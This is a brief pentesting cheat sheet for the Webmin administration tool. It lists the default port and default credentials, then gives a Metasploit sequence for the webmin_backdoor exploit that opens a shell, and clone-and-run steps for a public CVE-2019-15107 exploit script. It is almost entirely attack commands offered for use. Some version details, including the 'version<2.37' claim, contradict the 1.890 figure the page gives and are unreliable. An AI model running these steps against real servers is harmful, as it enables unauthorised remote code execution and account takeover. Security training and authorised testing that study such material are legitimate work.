Webmin Pentesting
Last modified: 2022-12-01
Webmin is a web-based system administration tool for Unix. The default port is 10000.
Default Credentials
admin:admin
password_chagne.cgi Command Injection version=1.890
msfconsole
msf> use exploit/linux/http/webmin_backdoor
msf> set rhosts <target-ip>
msf> set lhost <local-ip>
msf> run
shell
Remote Code Execution (RCE) version<2.37
Webmin version<2.37 is vulnerable to remote code execution.
Download the payload .
git clone https://github.com/MuirlandOracle/CVE-2019-15107
cd CVE-2019-15107
python3 CVE-2019-15107.py <target-ip>